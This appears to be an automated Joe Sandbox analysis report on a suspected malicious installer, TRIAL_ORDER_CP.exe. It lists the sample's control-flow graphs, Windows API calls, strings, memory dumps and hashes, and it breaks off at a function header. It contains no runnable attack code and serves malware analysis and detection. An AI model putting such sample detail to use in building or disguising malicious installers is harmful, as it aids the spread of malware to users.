                                          control_flow_graph 620 405c60-405c86 call 405f2b 623 405c88-405c9a DeleteFileW 620->623 624 405c9f-405ca6 620->624 625 405e1c-405e20 623->625 626 405ca8-405caa 624->626 627 405cb9-405cc9 call 406554 624->627 628 405cb0-405cb3 626->628 629 405dca-405dcf 626->629 635 405cd8-405cd9 call 405e6f 627->635 636 405ccb-405cd6 lstrcatW 627->636 628->627 628->629 629->625 631 405dd1-405dd4 629->631 633 405dd6-405ddc 631->633 634 405dde-405de6 call 4068b1 631->634 633->625 634->625 644 405de8-405dfc call 405e23 call 405c18 634->644 639 405cde-405ce2 635->639 636->639 640 405ce4-405cec 639->640 641 405cee-405cf4 lstrcatW 639->641 640->641 643 405cf9-405d15 lstrlenW FindFirstFileW 640->643 641->643 645 405d1b-405d23 643->645 646 405dbf-405dc3 643->646 660 405e14-405e17 call 4055d9 644->660 661 405dfe-405e01 644->661 648 405d43-405d57 call 406554 645->648 649 405d25-405d2d 645->649 646->629 651 405dc5 646->651 662 405d59-405d61 648->662 663 405d6e-405d79 call 405c18 648->663 652 405da2-405db2 FindNextFileW 649->652 653 405d2f-405d37 649->653 651->629 652->645 659 405db8-405db9 FindClose 652->659 653->648 656 405d39-405d41 653->656 656->648 656->652 659->646 660->625 661->633 666 405e03-405e12 call 4055d9 call 406314 661->666 662->652 667 405d63-405d6c call 405c60 662->667 671 405d9a-405d9d call 4055d9 663->671 672 405d7b-405d7e 663->672 666->625 667->652 671->652 675 405d80-405d90 call 4055d9 call 406314 672->675 676 405d92-405d98 672->676 675->652 676->652
                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405C89
                                          • lstrcatW.KERNEL32(007A3750,\*.*,007A3750,?,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405CD1
                                          • lstrcatW.KERNEL32(?,0040A014,?,007A3750,?,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405CF4
                                          • lstrlenW.KERNEL32(?,?,0040A014,?,007A3750,?,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405CFA
                                          • FindFirstFileW.KERNEL32(007A3750,?,?,?,0040A014,?,007A3750,?,?,75D23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00405D0A
                                          • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405DAA
                                          • FindClose.KERNEL32(00000000), ref: 00405DB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"$C:\Users\user\AppData\Local\Temp\$P7z$\*.*
                                          • API String ID: 2035342205-1424711887
                                          • Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                          • Instruction ID: f748e5475402f1fc91d3f7fbe8cbfa38c73e6686c0f945f98d649a4eb698cdfa
                                          • Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                          • Instruction Fuzzy Hash: EB41B231800A14B6DB216B26CC49BAF7678EF81714F20813BF441B11D1DB7C4A829EAE
                                          Function 004068B1 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75D23420,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                          • FindClose.KERNEL32(00000000), ref: 004068C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                          • Instruction ID: c1f58c6a55c378a7321320ff0386b713db4abc0e26cca29c2297fdfd4174c4a1
                                          • Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                          • Instruction Fuzzy Hash: CFD0123251A1305BC28027386D0C84B7B98AF56331712CB36F16AF21E0C7748C6287A8
                                          Function 00403FD4 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 151 403fd4-403fe6 152 403fec-403ff2 151->152 153 40414d-40415c 151->153 152->153 154 403ff8-404001 152->154 155 4041ab-4041c0 153->155 156 40415e-4041a6 GetDlgItem * 2 call 4044d3 SetClassLongW call 40140b 153->156 157 404003-404010 SetWindowPos 154->157 158 404016-40401d 154->158 160 404200-404205 call 40451f 155->160 161 4041c2-4041c5 155->161 156->155 157->158 163 404061-404067 158->163 164 40401f-404039 ShowWindow 158->164 169 40420a-404225 160->169 166 4041c7-4041d2 call 401389 161->166 167 4041f8-4041fa 161->167 172 404080-404083 163->172 173 404069-40407b DestroyWindow 163->173 170 40413a-404148 call 40453a 164->170 171 40403f-404052 GetWindowLongW 164->171 166->167 192 4041d4-4041f3 SendMessageW 166->192 167->160 168 4044a0 167->168 180 4044a2-4044a9 168->180 177 404227-404229 call 40140b 169->177 178 40422e-404234 169->178 170->180 171->170 179 404058-40405b ShowWindow 171->179 183 404085-404091 SetWindowLongW 172->183 184 404096-40409c 172->184 181 40447d-404483 173->181 177->178 189 40423a-404245 178->189 190 40445e-404477 DestroyWindow EndDialog 178->190 179->163 181->168 188 404485-40448b 181->188 183->180 184->170 191 4040a2-4040b1 GetDlgItem 184->191 188->168 193 40448d-404496 ShowWindow 188->193 189->190 194 40424b-404298 call 406591 call 4044d3 * 3 GetDlgItem 189->194 190->181 195 4040d0-4040d3 191->195 196 4040b3-4040ca SendMessageW IsWindowEnabled 191->196 192->180 193->168 223 4042a2-4042de ShowWindow KiUserCallbackDispatcher call 4044f5 EnableWindow 194->223 224 40429a-40429f 194->224 198 4040d5-4040d6 195->198 199 4040d8-4040db 195->199 196->168 196->195 200 404106-40410b call 4044ac 198->200 201 4040e9-4040ee 199->201 202 4040dd-4040e3 199->202 200->170 204 404124-404134 SendMessageW 201->204 206 4040f0-4040f6 201->206 202->204 205 4040e5-4040e7 202->205 204->170 205->200 209 4040f8-4040fe call 40140b 206->209 210 40410d-404116 call 40140b 206->210 219 404104 209->219 210->170 220 404118-404122 210->220 219->200 220->219 227 4042e0-4042e1 223->227 228 4042e3 223->228 224->223 229 4042e5-404313 GetSystemMenu EnableMenuItem SendMessageW 227->229 228->229 230 404315-404326 SendMessageW 229->230 231 404328 229->231 232 40432e-40436d call 404508 call 403fb5 call 406554 lstrlenW call 406591 SetWindowTextW call 401389 230->232 231->232 232->169 243 404373-404375 232->243 243->169 244 40437b-40437f 243->244 245 404381-404387 244->245 246 40439e-4043b2 DestroyWindow 244->246 245->168 247 40438d-404393 245->247 246->181 248 4043b8-4043e5 CreateDialogParamW 246->248 247->169 249 404399 247->249 248->181 250 4043eb-404442 call 4044d3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 248->250 249->168 250->168 255 404444-404457 ShowWindow call 40451f 250->255 257 40445c 255->257 257->181
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404010
                                          • ShowWindow.USER32(?), ref: 00404030
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404042
                                          • ShowWindow.USER32(?,00000004), ref: 0040405B
                                          • DestroyWindow.USER32 ref: 0040406F
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404088
                                          • GetDlgItem.USER32(?,?), ref: 004040A7
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BB
                                          • IsWindowEnabled.USER32(00000000), ref: 004040C2
                                          • GetDlgItem.USER32(?,00000001), ref: 0040416D
                                          • GetDlgItem.USER32(?,00000002), ref: 00404177
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00404191
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E2
                                          • GetDlgItem.USER32(?,00000003), ref: 00404288
                                          • ShowWindow.USER32(00000000,?), ref: 004042A9
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BB
                                          • EnableWindow.USER32(?,?), ref: 004042D6
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EC
                                          • EnableMenuItem.USER32(00000000), ref: 004042F3
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430B
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040431E
                                          • lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404348
                                          • SetWindowTextW.USER32(?,007A1748), ref: 0040435C
                                          • ShowWindow.USER32(?,0000000A), ref: 00404490
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID:
                                          • API String ID: 121052019-0
                                          • Opcode ID: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                          • Instruction ID: 556acdb9000d186b886cde9212830cd241fbea6c4840fceff67d75b478af1997
                                          • Opcode Fuzzy Hash: bc3e7111866138a7d9fc3d457d106daad5acaba352cfb8b9f49eaf3ae0b18d54
                                          • Instruction Fuzzy Hash: 13C1C0B1500604ABDB206F61ED85B2A3A68FBD6359F00453EF791B51F0CB3D5891DB2E
                                          Function 00403C26 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 258 403c26-403c3e call 406948 261 403c40-403c50 call 40649b 258->261 262 403c52-403c89 call 406422 258->262 271 403cac-403cd5 call 403efc call 405f2b 261->271 266 403ca1-403ca7 lstrcatW 262->266 267 403c8b-403c9c call 406422 262->267 266->271 267->266 276 403d67-403d6f call 405f2b 271->276 277 403cdb-403ce0 271->277 282 403d71-403d78 call 406591 276->282 283 403d7d-403da2 LoadImageW 276->283 277->276 278 403ce6-403d0e call 406422 277->278 278->276 285 403d10-403d14 278->285 282->283 287 403e23-403e2b call 40140b 283->287 288 403da4-403dd4 RegisterClassW 283->288 289 403d26-403d32 lstrlenW 285->289 290 403d16-403d23 call 405e50 285->290 301 403e35-403e40 call 403efc 287->301 302 403e2d-403e30 287->302 291 403ef2 288->291 292 403dda-403e1e SystemParametersInfoW CreateWindowExW 288->292 296 403d34-403d42 lstrcmpiW 289->296 297 403d5a-403d62 call 405e23 call 406554 289->297 290->289 295 403ef4-403efb 291->295 292->287 296->297 300 403d44-403d4e GetFileAttributesW 296->300 297->276 304 403d50-403d52 300->304 305 403d54-403d55 call 405e6f 300->305 311 403e46-403e60 ShowWindow call 4068d8 301->311 312 403ec9-403ed1 call 4056ac 301->312 302->295 304->297 304->305 305->297 317 403e62-403e67 call 4068d8 311->317 318 403e6c-403e7e GetClassInfoW 311->318 319 403ed3-403ed9 312->319 320 403eeb-403eed call 40140b 312->320 317->318 323 403e80-403e90 GetClassInfoW RegisterClassW 318->323 324 403e96-403eb9 DialogBoxParamW call 40140b 318->324 319->302 325 403edf-403ee6 call 40140b 319->325 320->291 323->324 328 403ebe-403ec7 call 403b76 324->328 325->302 328->295
                                          APIs
                                            • Part of subcall function 00406948: GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C), ref: 0040695A
                                            • Part of subcall function 00406948: GetProcAddress.KERNEL32(00000000,?), ref: 00406975
                                          • lstrcatW.KERNEL32(1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75D23420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"), ref: 00403CA7
                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,75D23420), ref: 00403D27
                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D3A
                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403D45
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical), ref: 00403D8E
                                            • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                          • RegisterClassW.USER32(007A7200), ref: 00403DCB
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE3
                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E18
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403E4E
                                          • GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E7A
                                          • GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E87
                                          • RegisterClassW.USER32(007A7200), ref: 00403E90
                                          • DialogBoxParamW.USER32(?,00000000,00403FD4,00000000), ref: 00403EAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bygvrkerne\linda\balaamitical$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                          • API String ID: 1975747703-3453379739
                                          • Opcode ID: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                          • Instruction ID: 87c0a3a17ad5e1939fcd37e1134105fdbaf016035d588be57f40016c0fe971d1
                                          • Opcode Fuzzy Hash: 889c8ef34167dee75fdbefa7f7ea3591ee246ed7a83750caaaa5a9fc269d37bc
                                          • Instruction Fuzzy Hash: CA61D370100605AED720BF269D45F2B3AACFB85B49F40453EF951B62E2DB7C9901CB6D
                                          Function 004030A2 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 332 4030a2-4030f0 GetTickCount GetModuleFileNameW call 406044 335 4030f2-4030f7 332->335 336 4030fc-40312a call 406554 call 405e6f call 406554 GetFileSize 332->336 337 4032d2-4032d6 335->337 344 403130 336->344 345 403215-403223 call 40303e 336->345 346 403135-40314c 344->346 351 403225-403228 345->351 352 403278-40327d 345->352 348 403150-403159 call 4034d1 346->348 349 40314e 346->349 358 40327f-403287 call 40303e 348->358 359 40315f-403166 348->359 349->348 354 40322a-403242 call 4034e7 call 4034d1 351->354 355 40324c-403276 GlobalAlloc call 4034e7 call 4032d9 351->355 352->337 354->352 378 403244-40324a 354->378 355->352 383 403289-40329a 355->383 358->352 362 4031e2-4031e6 359->362 363 403168-40317c call 405fff 359->363 367 4031f0-4031f6 362->367 368 4031e8-4031ef call 40303e 362->368 363->367 381 40317e-403185 363->381 374 403205-40320d 367->374 375 4031f8-403202 call 406a35 367->375 368->367 374->346 382 403213 374->382 375->374 378->352 378->355 381->367 387 403187-40318e 381->387 382->345 384 4032a2-4032a7 383->384 385 40329c 383->385 388 4032a8-4032ae 384->388 385->384 387->367 389 403190-403197 387->389 388->388 390 4032b0-4032cb SetFilePointer call 405fff 388->390 389->367 391 403199-4031a0 389->391 394 4032d0 390->394 391->367 393 4031a2-4031c2 391->393 393->352 395 4031c8-4031cc 393->395 394->337 396 4031d4-4031dc 395->396 397 4031ce-4031d2 395->397 396->367 398 4031de-4031e0 396->398 397->382 397->396 398->367
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004030B3
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,00000400), ref: 004030CF
                                            • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 00406048
                                            • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 0040311B
                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403251
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                          • String ID: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\TRIAL_ORDER_CP.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 2803837635-3234720581
                                          • Opcode ID: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                          • Instruction ID: 049f7c6d5ff3921a21710fe3aab5a9d19a74ce2d4ccd47fede02a431b1dffc51
                                          • Opcode Fuzzy Hash: a0dd9f8ef326ba969c16cb1fd88c965c76ed405712e773b35a873600aa04ef71
                                          • Instruction Fuzzy Hash: A4519F71901204AFDF209FA5DD86BAE7EACAB45356F20817BF500B62D1CA7C9E408B5D
                                          Function 00406591 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
